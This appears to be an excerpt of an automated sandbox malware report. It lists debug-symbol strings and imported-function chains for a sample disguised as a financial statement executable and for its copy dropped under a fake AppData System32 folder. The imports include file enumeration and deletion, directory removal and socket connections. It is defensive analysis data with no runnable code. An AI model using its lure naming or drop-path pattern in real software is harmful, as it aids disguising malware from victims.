          Source: Binary string: .pdbH source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: cfgmgr32.pdb4 source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: .pdbE source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb> source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: .pdbA source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: edputil.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00404C0A
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,7_2_0040751B
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr7_2_00410586
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,7_2_0040728F
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE7_2_0040477E
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00403325
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,7_2_00412BEE
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,25_2_00404C0A
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,25_2_0040751B
